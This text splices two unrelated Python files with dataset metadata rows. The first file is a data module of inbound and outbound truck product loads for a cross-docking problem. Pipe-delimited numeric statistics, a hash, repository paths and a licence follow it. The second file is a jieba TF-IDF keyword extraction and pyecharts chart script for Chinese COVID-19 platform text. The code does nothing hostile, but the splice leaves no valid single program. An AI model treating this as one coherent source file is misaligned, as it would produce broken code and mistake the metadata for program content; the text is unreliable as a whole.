inbound_gate_count = 25
outbound_gate_count = 25
# Parameters used to generate this data.
number_of_total_product_types = 20
product_per_truck_rate = 0.35
possible_inbound_total_product = [250, 340]
# Truck data.
_inbound_truck_raw_data = [
[0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 67, 175, 0, 3, 0, 0, 0, 0, 0],
[0, 0, 21, 0, 0, 48, 0, 0, 0, 0, 0, 0, 0, 0, 83, 0, 98, 0, 0, 0],
[0, 0, 0, 0, 4, 36, 96, 130, 0, 0, 0, 36, 0, 0, 0, 0, 0, 38, 0, 0],
[0, 0, 0, 0, 0, 50, 0, 0, 0, 17, 0, 7, 107, 0, 0, 0, 142, 0, 17, 0],
[0, 0, 0, 0, 0, 20, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 220],
[0, 0, 22, 175, 0, 0, 0, 0, 9, 0, 0, 0, 44, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 71, 0, 0, 0, 0, 21, 0, 0, 11, 0, 0, 0, 0, 147, 0, 0],
[0, 0, 0, 0, 0, 6, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 43, 0, 197],
[146, 0, 0, 0, 8, 0, 0, 0, 0, 0, 11, 53, 0, 106, 0, 0, 0, 16, 0, 0],
[0, 0, 0, 0, 0, 91, 0, 0, 0, 130, 30, 0, 15, 0, 0, 50, 0, 24, 0, 0],
[0, 0, 77, 11, 0, 0, 0, 156, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0],
[0, 71, 0, 0, 0, 22, 0, 0, 50, 0, 0, 0, 0, 58, 25, 0, 114, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 61, 0, 0, 54, 0, 0, 0, 0, 106, 29, 0, 0],
[26, 56, 0, 0, 0, 0, 0, 0, 0, 0, 60, 0, 0, 0, 0, 0, 0, 108, 0, 0],
[0, 0, 0, 0, 78, 0, 0, 0, 0, 0, 0, 103, 88, 6, 56, 0, 0, 0, 9, 0],
[0, 0, 0, 22, 0, 0, 0, 0, 0, 8, 0, 0, 37, 0, 182, 0, 10, 81, 0, 0],
[0, 0, 57, 0, 0, 0, 0, 49, 0, 0, 87, 0, 0, 0, 0, 0, 0, 57, 0, 0],
[0, 0, 0, 0, 45, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 47],
[113, 0, 0, 0, 0, 158, 0, 0, 7, 17, 0, 0, 0, 45, 0, 0, 0, 0, 0, 0],
[5, 0, 0, 0, 0, 74, 77, 0, 0, 0, 0, 0, 0, 65, 118, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 41, 0, 0, 173, 0, 0, 9, 0, 0, 0, 0, 0, 27, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 0, 0, 122, 109, 0, 9, 0],
[7, 30, 0, 85, 45, 0, 127, 0, 0, 46, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 16, 0, 0, 0, 0, 0, 0, 145, 0, 61, 0, 0, 0, 60, 0, 13, 0, 0, 45],
[35, 0, 0, 0, 0, 125, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 84, 0],
[0, 0, 0, 39, 0, 0, 2, 0, 0, 0, 0, 0, 206, 0, 3, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 95, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 140, 0, 0],
[0, 51, 0, 92, 0, 0, 0, 0, 0, 0, 0, 0, 0, 42, 0, 0, 0, 65, 0, 0],
[74, 0, 0, 81, 0, 64, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 91, 0, 0, 0, 0, 50, 0, 0, 46, 0, 0, 0, 0, 0, 0, 63, 0, 0],
[0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 0, 18, 0, 64, 105, 0, 12, 106, 0],
[20, 5, 0, 0, 109, 0, 0, 0, 0, 0, 167, 0, 37, 0, 0, 2, 0, 0, 0, 0],
[8, 0, 0, 0, 60, 0, 185, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 57, 15, 0],
[0, 125, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 59, 0, 0, 0, 0, 61, 0, 0],
[6, 0, 0, 0, 0, 0, 0, 89, 0, 0, 9, 0, 0, 141, 0, 0, 32, 63, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 0, 222, 2, 0, 14],
[57, 44, 0, 0, 144, 0, 0, 0, 0, 0, 0, 0, 76, 0, 0, 0, 9, 0, 0, 10],
[0, 0, 0, 0, 0, 119, 0, 0, 0, 49, 0, 0, 69, 37, 30, 0, 0, 0, 36, 0],
[0, 0, 0, 63, 16, 0, 0, 58, 111, 0, 0, 74, 0, 0, 0, 0, 18, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 34, 0, 0, 193, 1, 0, 0, 0, 0, 43, 27, 0, 42, 0],
[0, 49, 0, 30, 0, 0, 37, 0, 0, 0, 0, 0, 41, 0, 40, 0, 143, 0, 0, 0],
[0, 0, 126, 0, 0, 0, 0, 0, 0, 16, 0, 53, 0, 0, 0, 55, 0, 0, 0, 0],
[0, 0, 22, 0, 0, 0, 0, 46, 0, 0, 140, 0, 0, 0, 0, 0, 0, 0, 0, 42],
[106, 31, 0, 0, 0, 0, 26, 0, 0, 87, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[110, 0, 0, 0, 0, 0, 0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 26, 0, 0, 24],
[0, 0, 0, 11, 0, 28, 15, 275, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 0],
[0, 0, 0, 48, 28, 73, 0, 0, 0, 0, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0],
[41, 120, 0, 0, 72, 0, 18, 0, 0, 0, 0, 44, 45, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 92, 0, 0, 0, 0, 0, 118, 0, 0, 0, 88, 28, 8, 0, 6, 0, 0],
[0, 0, 49, 0, 0, 0, 29, 8, 0, 135, 0, 0, 78, 41, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 161, 0, 0, 0, 0, 0, 0, 0, 41, 0, 7, 0, 0, 0, 0, 41, 0],
[0, 0, 0, 0, 57, 141, 0, 0, 0, 0, 0, 0, 39, 13, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 221, 43, 0, 0, 19, 0, 0, 0, 3, 0, 2, 0, 0, 52, 0, 0],
[0, 0, 107, 0, 0, 0, 0, 62, 18, 0, 0, 0, 22, 14, 0, 0, 117, 0, 0, 0],
[0, 0, 0, 2, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 227, 15, 0, 35, 30],
[0, 0, 64, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, 34, 0, 0, 111, 0, 0, 0],
[0, 0, 0, 0, 37, 61, 0, 115, 0, 0, 0, 0, 0, 0, 43, 0, 0, 0, 48, 36],
[0, 0, 0, 0, 39, 0, 91, 37, 0, 0, 0, 0, 0, 0, 79, 70, 24, 0, 0, 0],
[0, 48, 0, 24, 3, 0, 92, 0, 0, 0, 39, 0, 0, 0, 0, 0, 0, 134, 0, 0],
[5, 0, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 40, 0, 7, 0, 29, 152],
[0, 0, 90, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 106, 0, 0, 50, 0],
[0, 0, 0, 0, 0, 36, 9, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 91, 0],
[0, 0, 0, 0, 0, 101, 0, 0, 0, 0, 32, 0, 11, 106, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 39, 0, 0, 121, 0, 0, 54, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0],
[0, 0, 0, 0, 0, 85, 29, 25, 0, 111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 6, 0, 8, 200, 0, 0, 0, 0, 7, 0, 0, 0, 0, 101, 0, 0, 0, 18, 0],
[0, 115, 0, 0, 0, 22, 0, 0, 0, 0, 0, 9, 0, 70, 15, 0, 0, 0, 109, 0],
[0, 0, 0, 0, 25, 0, 8, 91, 0, 0, 0, 0, 0, 0, 2, 0, 0, 68, 146, 0],
[0, 124, 0, 0, 0, 0, 0, 0, 91, 0, 0, 7, 0, 0, 0, 0, 0, 0, 28, 0],
[0, 0, 0, 0, 0, 0, 50, 0, 90, 0, 0, 0, 73, 0, 0, 0, 15, 6, 0, 106],
[0, 0, 13, 0, 238, 53, 0, 0, 0, 2, 0, 9, 0, 25, 0, 0, 0, 0, 0, 0],
[0, 0, 16, 0, 0, 0, 0, 181, 0, 52, 0, 0, 0, 0, 24, 19, 0, 0, 0, 48],
[0, 0, 0, 0, 0, 51, 0, 0, 0, 17, 0, 0, 91, 0, 0, 0, 0, 91, 0, 0],
[0, 0, 83, 116, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4],
[0, 0, 0, 0, 0, 21, 0, 8, 0, 94, 0, 0, 82, 19, 0, 0, 0, 116, 0, 0],
]
_outbound_truck_raw_data = [
[9, 0, 4, 4, 2, 1, 3, 26, 0, 1, 5, 8, 31, 2, 13, 7, 4, 1, 0, 21],
[1, 0, 3, 16, 2, 3, 2, 29, 2, 1, 0, 6, 1, 5, 2, 18, 7, 5, 4, 10],
[6, 11, 14, 1, 33, 0, 7, 17, 6, 16, 3, 3, 6, 6, 2, 13, 0, 4, 0, 3],
[2, 3, 2, 20, 10, 7, 9, 12, 1, 5, 2, 12, 9, 1, 11, 7, 3, 7, 13, 8],
[5, 8, 5, 2, 6, 9, 9, 6, 36, 18, 2, 3, 10, 10, 3, 0, 3, 15, 20, 17],
[0, 2, 3, 25, 39, 12, 22, 4, 16, 6, 3, 7, 34, 12, 13, 19, 3, 3, 2, 16],
[5, 9, 8, 26, 37, 1, 15, 18, 15, 15, 3, 11, 1, 9, 7, 0, 27, 13, 5, 8],
[0, 10, 16, 4, 10, 36, 10, 23, 4, 28, 41, 0, 4, 6, 5, 3, 5, 6, 2, 1],
[14, 0, 11, 10, 22, 0, 2, 20, 6, 7, 3, 6, 6, 6, 4, 11, 15, 1, 1, 10],
[10, 6, 0, 4, 18, 7, 7, 5, 9, 3, 1, 1, 18, 13, 9, 3, 3, 6, 1, 2],
[1, 1, 6, 1, 35, 5, 17, 12, 1, 19, 5, 10, 11, 6, 10, 1, 3, 12, 1, 5],
[6, 7, 16, 13, 7, 8, 3, 0, 4, 9, 0, 2, 22, 19, 4, 1, 8, 4, 3, 4],
[10, 7, 5, 2, 9, 35, 2, 14, 3, 11, 3, 8, 22, 4, 17, 48, 23, 14, 9, 3],
[3, 20, 5, 16, 28, 6, 1, 0, 5, 2, 9, 1, 4, 1, 1, 3, 6, 26, 1, 7],
[13, 2, 6, 8, 17, 3, 21, 7, 8, 5, 3, 6, 33, 1, 2, 4, 1, 3, 4, 13],
[5, 10, 8, 9, 1, 14, 7, 7, 6, 31, 10, 4, 30, 7, 12, 26, 19, 6, 1, 13],
[7, 3, 8, 9, 12, 16, 24, 20, 4, 1, 14, 16, 4, 3, 4, 9, 5, 3, 28, 4],
[20, 8, 18, 0, 17, 0, 23, 0, 8, 5, 3, 4, 4, 2, 4, 7, 14, 9, 15, 9],
[8, 5, 29, 0, 20, 30, 10, 8, 0, 37, 22, 6, 5, 1, 2, 6, 13, 23, 1, 7],
[0, 4, 1, 3, 5, 13, 4, 47, 2, 1, 2, 2, 0, 0, 1, 3, 15, 15, 6, 0],
[9, 1, 2, 27, 0, 6, 11, 5, 1, 15, 4, 4, 2, 10, 16, 19, 8, 5, 4, 10],
[3, 10, 7, 1, 18, 21, 18, 10, 4, 8, 4, 10, 26, 22, 20, 9, 1, 52, 18, 8],
[4, 6, 7, 6, 32, 13, 2, 12, 15, 34, 1, 15, 10, 8, 10, 0, 1, 2, 14, 24],
[10, 2, 8, 12, 9, 25, 11, 14, 5, 1, 7, 8, 19, 1, 5, 5, 26, 19, 18, 24],
[5, 1, 8, 11, 7, 6, 16, 35, 1, 4, 13, 6, 17, 6, 1, 2, 3, 14, 5, 7],
[1, 4, 17, 10, 12, 1, 3, 0, 2, 7, 7, 1, 10, 1, 9, 10, 13, 15, 7, 4],
[8, 20, 14, 20, 9, 2, 7, 4, 4, 12, 1, 13, 15, 10, 5, 14, 1, 6, 14, 15],
[11, 16, 10, 1, 16, 1, 5, 0, 0, 3, 1, 3, 35, 10, 7, 5, 10, 5, 4, 5],
[4, 8, 3, 15, 4, 1, 1, 5, 26, 3, 5, 2, 16, 2, 1, 1, 0, 18, 4, 10],
[5, 19, 28, 6, 7, 22, 1, 10, 6, 6, 2, 6, 8, 3, 4, 3, 47, 15, 2, 1],
[3, 4, 6, 37, 14, 1, 10, 36, 2, 3, 1, 2, 8, 17, 5, 8, 10, 2, 2, 7],
[2, 7, 17, 51, 50, 16, 2, 3, 16, 19, 2, 2, 20, 0, 2, 4, 15, 4, 4, 4],
[1, 6, 6, 5, 4, 6, 2, 0, 7, 8, 1, 3, 7, 0, 5, 9, 10, 19, 14, 0],
[26, 0, 1, 7, 2, 14, 2, 8, 7, 16, 3, 1, 2, 1, 21, 1, 28, 2, 0, 7],
[10, 9, 5, 11, 12, 10, 10, 12, 19, 12, 2, 13, 16, 3, 0, 8, 6, 8, 1, 5],
[10, 8, 1, 3, 27, 9, 7, 10, 21, 29, 1, 6, 22, 5, 12, 6, 7, 27, 2, 13],
[8, 11, 5, 0, 23, 9, 5, 4, 1, 25, 0, 3, 5, 0, 3, 11, 2, 20, 2, 16],
[8, 2, 8, 6, 13, 42, 47, 10, 10, 1, 2, 30, 4, 4, 6, 6, 2, 33, 18, 9],
[0, 31, 6, 2, 19, 1, 5, 15, 5, 1, 11, 1, 37, 3, 1, 2, 1, 4, 5, 15],
[2, 12, 27, 7, 18, 13, 4, 2, 3, 9, 19, 2, 5, 3, 10, 1, 34, 3, 3, 6],
[2, 2, 3, 8, 7, 4, 39, 6, 1, 1, 14, 1, 2, 9, 9, 25, 14, 18, 7, 2],
[3, 45, 1, 2, 1, 5, 9, 1, 3, 1, 20, 3, 12, 3, 6, 4, 9, 7, 35, 2],
[2, 8, 2, 9, 12, 0, 6, 2, 0, 0, 10, 8, 0, 4, 2, 6, 4, 17, 21, 9],
[1, 8, 0, 24, 5, 1, 5, 8, 2, 1, 1, 9, 13, 11, 12, 2, 1, 11, 3, 19],
[1, 21, 4, 16, 7, 65, 28, 22, 5, 3, 4, 10, 23, 5, 6, 11, 6, 8, 6, 4],
[1, 12, 0, 6, 3, 0, 8, 25, 0, 14, 7, 9, 0, 14, 2, 2, 0, 21, 3, 2],
[3, 7, 16, 1, 1, 1, 1, 11, 0, 4, 0, 5, 21, 2, 15, 9, 1, 8, 13, 3],
[2, 9, 26, 0, 2, 15, 19, 22, 1, 12, 6, 2, 5, 6, 13, 15, 19, 4, 13, 27],
[8, 15, 1, 22, 4, 40, 18, 18, 9, 2, 8, 3, 23, 34, 3, 2, 10, 3, 11, 2],
[1, 9, 4, 4, 2, 1, 2, 9, 7, 14, 0, 15, 0, 7, 44, 5, 15, 39, 17, 8],
[6, 20, 3, 2, 10, 4, 2, 1, 1, 10, 14, 2, 8, 6, 1, 2, 4, 12, 0, 15],
[12, 6, 13, 13, 24, 0, 3, 1, 8, 6, 0, 1, 20, 6, 9, 6, 7, 43, 1, 2],
[3, 1, 3, 4, 4, 29, 9, 3, 2, 26, 3, 4, 2, 2, 3, 4, 10, 4, 10, 8],
[3, 15, 3, 8, 0, 50, 26, 15, 2, 33, 11, 0, 0, 7, 13, 4, 25, 2, 3, 3],
[12, 6, 8, 1, 20, 7, 15, 10, 11, 1, 1, 12, 38, 4, 5, 0, 22, 4, 2, 4],
[2, 4, 5, 3, 3, 1, 8, 2, 6, 19, 1, 3, 6, 0, 1, 1, 10, 6, 5, 3],
[2, 2, 15, 3, 31, 0, 2, 6, 1, 25, 1, 2, 4, 4, 30, 10, 21, 15, 21, 5],
[1, 13, 1, 7, 1, 5, 14, 4, 11, 8, 7, 6, 23, 3, 0, 2, 7, 7, 6, 14],
[0, 17, 3, 1, 2, 15, 5, 2, 7, 10, 0, 1, 32, 2, 18, 7, 28, 1, 1, 6],
[3, 13, 15, 7, 13, 4, 17, 17, 11, 10, 3, 6, 20, 24, 10, 1, 7, 3, 25, 6],
[2, 8, 8, 9, 7, 2, 15, 25, 3, 1, 1, 13, 7, 8, 2, 2, 10, 11, 2, 25],
[21, 21, 4, 18, 13, 24, 1, 22, 4, 9, 3, 1, 7, 7, 13, 19, 13, 16, 1, 2],
[3, 1, 16, 3, 5, 19, 14, 7, 3, 36, 12, 1, 24, 7, 6, 1, 10, 6, 2, 20],
[1, 7, 6, 1, 37, 3, 3, 18, 5, 35, 10, 3, 1, 7, 2, 7, 5, 13, 2, 3],
[4, 1, 11, 0, 15, 9, 0, 13, 17, 2, 1, 1, 6, 14, 1, 1, 8, 1, 7, 4],
[9, 1, 1, 10, 12, 19, 1, 9, 6, 13, 2, 2, 9, 14, 1, 18, 9, 36, 4, 2],
[16, 5, 1, 19, 6, 7, 7, 26, 6, 4, 4, 5, 4, 1, 3, 11, 37, 7, 6, 1],
[3, 4, 14, 1, 2, 68, 8, 6, 3, 4, 1, 13, 3, 18, 6, 7, 15, 3, 1, 15],
[8, 7, 13, 6, 9, 7, 22, 6, 1, 2, 4, 7, 8, 5, 1, 14, 1, 5, 4, 10],
[6, 5, 6, 10, 2, 11, 15, 7, 2, 7, 2, 4, 8, 6, 9, 3, 17, 1, 9, 6],
[7, 1, 1, 17, 6, 5, 3, 9, 18, 16, 8, 6, 2, 23, 43, 10, 1, 8, 1, 1],
[1, 4, 1, 7, 28, 69, 21, 30, 4, 10, 0, 4, 5, 4, 3, 1, 20, 3, 5, 22],
[1, 1, 9, 4, 1, 7, 2, 3, 12, 1, 2, 6, 2, 4, 1, 7, 1, 17, 13, 0],
[3, 4, 2, 19, 0, 13, 4, 41, 8, 0, 8, 7, 20, 10, 4, 5, 9, 13, 2, 2],
[12, 5, 3, 20, 8, 4, 29, 11, 31, 5, 2, 1, 31, 12, 33, 9, 7, 2, 4, 0],
[8, 0, 13, 28, 14, 13, 32, 10, 6, 3, 1, 7, 1, 28, 4, 3, 16, 33, 4, 18],
[24, 3, 17, 7, 1, 31, 6, 26, 3, 0, 1, 22, 0, 11, 2, 10, 0, 5, 7, 1],
[6, 1, 0, 1, 23, 20, 14, 18, 7, 34, 9, 9, 13, 2, 1, 17, 4, 15, 10, 0],
[6, 6, 4, 25, 18, 17, 22, 2, 0, 46, 7, 5, 0, 3, 4, 4, 29, 0, 7, 25],
[3, 4, 0, 14, 9, 13, 6, 7, 2, 22, 7, 9, 20, 0, 4, 6, 1, 21, 10, 23],
[2, 9, 2, 7, 0, 37, 1, 9, 1, 3, 3, 4, 1, 1, 39, 5, 3, 12, 5, 4],
[12, 1, 4, 7, 2, 8, 11, 9, 11, 26, 5, 3, 23, 15, 26, 0, 1, 6, 34, 3],
[3, 4, 5, 1, 13, 22, 4, 9, 4, 1, 4, 3, 9, 7, 7, 2, 11, 15, 0, 13],
[8, 1, 13, 6, 4, 2, 3, 9, 1, 31, 0, 6, 11, 22, 18, 0, 3, 9, 2, 4],
[0, 3, 4, 5, 19, 0, 5, 33, 0, 13, 5, 1, 0, 7, 1, 3, 3, 2, 6, 2],
[19, 1, 7, 3, 4, 14, 24, 4, 18, 2, 21, 0, 1, 5, 9, 0, 3, 1, 7, 1],
[7, 14, 1, 14, 11, 1, 12, 15, 1, 40, 1, 12, 6, 10, 8, 4, 1, 11, 0, 1],
[3, 9, 2, 17, 13, 0, 5, 5, 6, 31, 5, 4, 2, 2, 30, 2, 14, 24, 0, 13],
[9, 8, 12, 20, 14, 27, 15, 14, 17, 3, 23, 2, 18, 11, 10, 1, 19, 9, 8, 27],
[3, 11, 12, 6, 2, 9, 10, 3, 1, 3, 1, 9, 11, 1, 2, 8, 33, 32, 9, 18],
[24, 4, 4, 21, 8, 43, 21, 25, 1, 9, 12, 0, 12, 3, 23, 22, 59, 13, 19, 7],
[1, 0, 17, 0, 16, 12, 6, 10, 1, 17, 0, 14, 1, 7, 3, 11, 5, 41, 11, 6],
[6, 11, 10, 15, 3, 9, 1, 5, 2, 1, 7, 3, 8, 5, 3, 10, 31, 0, 16, 21],
[5, 0, 3, 10, 19, 14, 15, 3, 3, 4, 1, 6, 0, 1, 0, 0, 1, 3, 13, 5],
[8, 4, 25, 4, 5, 14, 22, 0, 20, 6, 11, 0, 16, 25, 2, 1, 10, 12, 20, 0],
[3, 12, 5, 2, 24, 6, 9, 0, 0, 14, 12, 5, 1, 33, 5, 2, 11, 39, 3, 3],
[8, 5, 7, 8, 12, 6, 5, 18, 8, 8, 0, 3, 3, 2, 32, 3, 5, 5, 3, 2],
[4, 5, 24, 5, 2, 15, 5, 12, 2, 32, 3, 2, 17, 5, 2, 1, 1, 9, 24, 1],
[1, 5, 7, 3, 13, 21, 7, 3, 5, 1, 7, 1, 37, 3, 1, 0, 11, 8, 11, 0],
[6, 4, 3, 12, 20, 10, 0, 1, 6, 12, 0, 6, 9, 6, 2, 11, 9, 2, 1, 0],
[19, 6, 6, 2, 27, 13, 34, 2, 3, 3, 8, 2, 5, 7, 9, 11, 6, 23, 2, 8],
[5, 1, 6, 6, 31, 1, 14, 1, 18, 1, 6, 1, 3, 3, 2, 3, 13, 3, 9, 0],
[1, 5, 8, 18, 20, 6, 6, 2, 12, 11, 1, 28, 27, 5, 5, 18, 38, 11, 5, 3],
[6, 7, 6, 6, 15, 13, 4, 15, 8, 8, 1, 0, 1, 4, 3, 0, 37, 38, 3, 6],
[5, 10, 6, 7, 17, 18, 12, 7, 10, 3, 4, 15, 24, 4, 5, 7, 10, 4, 0, 4],
[12, 9, 1, 2, 4, 5, 9, 18, 0, 16, 6, 4, 1, 5, 2, 0, 11, 9, 4, 5],
[1, 10, 0, 7, 5, 10, 14, 5, 14, 15, 8, 4, 16, 9, 13, 18, 4, 6, 19, 2],
[6, 4, 15, 15, 4, 10, 40, 18, 6, 19, 3, 4, 4, 19, 6, 0, 16, 7, 0, 4],
[7, 4, 2, 1, 5, 53, 10, 6, 1, 18, 2, 9, 4, 2, 18, 3, 3, 8, 3, 2],
[26, 2, 2, 9, 0, 3, 5, 14, 26, 8, 15, 7, 4, 1, 9, 15, 8, 9, 2, 0],
[12, 4, 4, 13, 24, 17, 5, 28, 8, 4, 16, 6, 3, 6, 4, 12, 5, 19, 2, 8],
[3, 6, 13, 18, 13, 6, 3, 13, 1, 2, 3, 0, 6, 2, 4, 15, 19, 39, 0, 0],
[10, 6, 6, 3, 14, 4, 10, 4, 16, 5, 3, 0, 50, 6, 2, 17, 3, 6, 6, 3],
[8, 0, 3, 13, 1, 14, 4, 16, 2, 9, 4, 4, 6, 10, 3, 4, 1, 22, 12, 5],
[1, 1, 2, 30, 19, 11, 7, 11, 2, 9, 2, 1, 26, 12, 27, 2, 3, 3, 18, 4],
[2, 15, 2, 20, 8, 4, 9, 15, 0, 5, 4, 16, 4, 9, 5, 2, 2, 24, 3, 8],
[1, 13, 6, 17, 11, 4, 6, 10, 14, 2, 16, 7, 19, 1, 6, 5, 27, 8, 19, 43],
[10, 18, 4, 10, 16, 0, 8, 26, 8, 8, 0, 6, 7, 12, 8, 11, 28, 35, 34, 7],
[8, 6, 34, 2, 9, 2, 11, 0, 6, 15, 11, 4, 13, 9, 5, 1, 8, 13, 1, 5],
[10, 1, 3, 5, 14, 0, 1, 21, 10, 7, 1, 13, 35, 2, 3, 12, 11, 5, 1, 19],
[0, 2, 15, 6, 11, 40, 4, 15, 0, 16, 2, 2, 12, 10, 1, 4, 32, 9, 7, 24],
[2, 16, 4, 0, 3, 5, 6, 2, 17, 2, 3, 0, 18, 8, 1, 5, 8, 9, 16, 6],
[2, 13, 1, 20, 20, 30, 9, 7, 10, 3, 13, 0, 6, 19, 1, 32, 2, 5, 14, 2],
[3, 1, 19, 0, 7, 39, 10, 29, 1, 18, 6, 0, 2, 19, 19, 4, 24, 2, 1, 1],
[0, 5, 0, 8, 4, 12, 0, 15, 3, 1, 7, 1, 2, 2, 6, 2, 6, 18, 5, 0],
]
# Derived data.
inbound_truck_count = len(_inbound_truck_raw_data)
outbound_truck_count = len(_outbound_truck_raw_data)
total_truck_count = inbound_truck_count + outbound_truck_count
| 65.094017
| 100
| 0.385045
| 4,124
| 15,232
| 1.411251
| 0.051649
| 0.289347
| 0.31134
| 0.298282
| 0.232646
| 0.208763
| 0.178522
| 0.138832
| 0.11701
| 0.076976
| 0
| 0.510024
| 0.322151
| 15,232
| 233
| 101
| 65.373391
| 0.053656
| 0.022256
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004673
| 0
| 0.004673
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f93964eaddfac091be90688ba81287806d78337
| 5,530
|
py
|
Python
|
POA/scripts/tfidf.py
|
ashyseer/COVID-19ServiceWebsite
|
2eacb445a947c3004542ac3f87a5a88b12ab292d
|
[
"Apache-2.0"
] | 1
|
2020-07-15T06:37:25.000Z
|
2020-07-15T06:37:25.000Z
|
POA/scripts/tfidf.py
|
ashyseer/COVID-19ServiceWebsite
|
2eacb445a947c3004542ac3f87a5a88b12ab292d
|
[
"Apache-2.0"
] | null | null | null |
POA/scripts/tfidf.py
|
ashyseer/COVID-19ServiceWebsite
|
2eacb445a947c3004542ac3f87a5a88b12ab292d
|
[
"Apache-2.0"
] | 1
|
2020-07-18T08:25:12.000Z
|
2020-07-18T08:25:12.000Z
|
# coding=utf-8
import os
import time
import pandas as pd
import numpy as np
import jieba
import jieba.analyse
import matplotlib.pyplot as plt
from PIL import Image
from datetime import datetime
from matplotlib.font_manager import FontProperties
from openpyxl.workbook import Workbook
from pyecharts import options as opts
from pyecharts.charts import Bar
#####################################疫情平台####################################
#------------------------------------中文分词------------------------------------
cut_words = ""
data = pd.read_csv('中国社会组织_疫情防控1_1-2_20.csv')
for line in data['正文内容']:
line = str(line)
seg_list = jieba.cut(line,cut_all=False)
cut_words += (" ".join(seg_list))
# jieba.load_userdict("userdict.txt") # 自定义词典
# jieba.analyse.set_stop_words('stop_words.txt') # 停用词词典
# 提取主题词 返回的词频其实就是TF-IDF
keywords = jieba.analyse.extract_tags(cut_words,
topK=50,
withWeight=True,
allowPOS=('a','e','n','nr','ns', 'v')) #词性 形容词 叹词 名词 动词
# 以列表形式返回
print(keywords)
# 数据存储
pd.DataFrame(keywords, columns=['词语','重要性']).to_excel('TF_IDF关键词前50.xlsx')
# keyword本身包含两列数据
ss = pd.DataFrame(keywords,columns = ['词语','重要性'])
print(ss)
#------------------------------------matplotlib数据可视化------------------------------------
# plt.figure(figsize=(10,6))
# plt.title('TF-IDF Ranking')
# fig = plt.axes()
# plt.barh(range(len(ss.重要性[:25][::-1])),ss.重要性[:25][::-1])
# fig.set_yticks(np.arange(len(ss.重要性[:25][::-1])))
# font = FontProperties(fname=r'c:\windows\fonts\simsun.ttc')
# fig.set_yticklabels(ss.词语[:25][::-1],fontproperties=font)
# fig.set_xlabel('Importance')
# plt.savefig('TF-IDF Ranking.png')
# plt.show()
# #print('over')
#------------------------------------pyecharts数据可视化------------------------------------
data_x = np.array(ss.词语) #先将数据框转换为数组
data_x_list = data_x.tolist() #其次转换为列表
#print(data_x_list)
data_y = np.array(ss.重要性) #先将数据框转换为数组
data_y_list = data_y.tolist() #其次转换为列表
c = Bar()
# x轴
c.add_xaxis(data_x_list)
# y轴
c.add_yaxis('TF-IDF值',data_y_list)
# reversal_axis方法是反转xy轴
# c.reversal_axis()
# False则不显示y轴的值,默认为显示
c.set_series_opts(label_opts=opts.LabelOpts(is_show=False),
#markpoint_opts指定类型
# markpoint_opts=opts.MarkPointOpts(
# data = [
# opts.MarkPointItem(type_="max", name="最大值"),
# opts.MarkPointItem(type_="min", name="最小值"),
# ]
# )
)
c.set_global_opts(title_opts=opts.TitleOpts(title="疫情防控平台数据_TF-IDF _Ranking"),xaxis_opts=opts.AxisOpts(name='词语')
# datazoom_opts水平显示,vertical垂直显示
# datazoom_opts=opts.DataZoomOpts(orient="vertical")
)
c.render('疫情防控平台数据_TF-IDF _Ranking.html')
#####################################微博####################################
# #------------------------------------中文分词------------------------------------
# cut_words = ""
# data = pd.read_csv('weibo_data.csv')
#
# for line in data['微博中文内容']:
# line = str(line)
# seg_list = jieba.cut(line,cut_all=False)
# cut_words += (" ".join(seg_list))
#
#
# # jieba.load_userdict("userdict.txt") # 自定义词典
# # jieba.analyse.set_stop_words('stop_words.txt') # 停用词词典
#
# # 提取主题词 返回的词频其实就是TF-IDF
# keywords = jieba.analyse.extract_tags(cut_words,
# topK=50,
# withWeight=True,
# allowPOS=('a','e','n','nr','ns', 'v')) #词性 形容词 叹词 名词 动词
#
# # 以列表形式返回
# print(keywords)
#
# # 数据存储
# pd.DataFrame(keywords, columns=['词语','重要性']).to_excel('TF_IDF关键词前50.xlsx')
#
# # keyword本身包含两列数据
# ss = pd.DataFrame(keywords,columns = ['词语','重要性'])
# #print(ss)
#
# #------------------------------------数据可视化------------------------------------
